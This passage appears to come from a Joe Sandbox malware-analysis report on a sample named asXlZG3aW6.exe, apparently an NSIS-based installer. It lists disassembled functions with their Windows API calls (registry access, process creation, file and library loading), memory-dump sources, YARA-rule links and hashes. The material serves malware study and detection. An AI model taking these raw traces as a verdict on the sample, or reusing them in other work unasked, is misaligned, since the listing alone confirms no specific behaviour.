                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E
                                                                                                                                                                                    Function 00405E4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406090,80000002), ref: 00405E92
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406090,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 00405E9D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID: Call
                                                                                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                                                                                    • Opcode ID: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
                                                                                                                                                                                    • Instruction ID: 9bec2c93df88531f10cf132d6bbbb6393b4a4aad9e102c5e2669e285c315f56d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7015A72500619ABEF228F61CD09FDB3BACEF55365F00802AF955A2191D378DA54CBA8
                                                                                                                                                                                    Function 00405604 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040563A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Error launching installer, xrefs: 00405617
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                    • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                                                                                                                                                    • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
                                                                                                                                                                                    Function 00402245 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406268: FindFirstFileA.KERNELBASE(761F3410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
                                                                                                                                                                                      • Part of subcall function 00406268: FindClose.KERNELBASE(00000000), ref: 0040627F
                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 00402285
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040228F
                                                                                                                                                                                    • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1486964399-0
                                                                                                                                                                                    • Opcode ID: ff20544c2ed3dac402f8f2b813109ebe9ee71c32dfbbaf7ddd8f9ee1c86ac438
                                                                                                                                                                                    • Instruction ID: d5f3cc7070b45be46c117aed2d447856533355de8cadbfc7f2d6224e08b7e174
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff20544c2ed3dac402f8f2b813109ebe9ee71c32dfbbaf7ddd8f9ee1c86ac438
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC118671A04205AACB10EFF59949A9EBBB8EF04304F10403FB405FB2C1D6BCC5418B65
                                                                                                                                                                                    Function 004024DF Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                                                                                                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                    • Opcode ID: c7e20c0ea14cb53cf7e90ffa39c0c47fed26c4d9fa7a05aed64f9bce97d858d0
                                                                                                                                                                                    • Instruction ID: 7cc4705ec6358afed730085f06e11861ce0f90fa753b06a9139c19a758a622df
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e20c0ea14cb53cf7e90ffa39c0c47fed26c4d9fa7a05aed64f9bce97d858d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: D801B171A04105BFE7159F699E9CABF7A7CDF40348F10003EF405A61C0DAB84A459769
                                                                                                                                                                                    Function 100027E4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                                                    • Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                                                                                                                                                                    • Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55
                                                                                                                                                                                    Function 0040246D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                    • Opcode ID: 2eaecf5d1f25b3e9b3db91f8049c91aae304fb395841604b111722c4aac40b40
                                                                                                                                                                                    • Instruction ID: 63e30908c11e451fd6d37fbe2862c18829a27713504d584fb03aa75526d5f0f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eaecf5d1f25b3e9b3db91f8049c91aae304fb395841604b111722c4aac40b40
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D110471A00205EECB14CF64DA889AF7AB4DF04304F20403FE446B72C0D6B88A42DB29
                                                                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                                                                                                                                                    • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                                                                                                                                                                                    • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                                                                                                                                                                                    Function 0040237B Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023A5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseDeleteValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2831762973-0
                                                                                                                                                                                    • Opcode ID: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
                                                                                                                                                                                    • Instruction ID: 9f7344dbbbe295334ba4b59a8a7f158e9db2909d035d2b37875cf389d282e7c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
                                                                                                                                                                                    • Instruction Fuzzy Hash: D3F09632B04111ABD710BFB89B8EABE76A89B40354F25003FEA05B71C1D9FC4D02476D
                                                                                                                                                                                    Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                                                    • Opcode ID: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
                                                                                                                                                                                    • Instruction ID: 3dc443410be61cb95396677418e376cd67e931bc8a1c74ede8e95758ff339cf3
                                                                                                                                                                                    • Opcode Fuzzy Hash: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E01272B082129FD714EBB6AA495AE77B4EB40325B10403BE415F11D1DE7888419F5D
                                                                                                                                                                                    Function 004062FD Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                                                                                                                                                                      • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                                                                                                                                                                      • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
                                                                                                                                                                                      • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                    • Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                                                                                                                                                                                    • Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
                                                                                                                                                                                    Function 00405AFE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                    • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                                                                                                                    • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                                                                                                                                    Function 004055CF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
                                                                                                                                                                                    Memory Dump Source
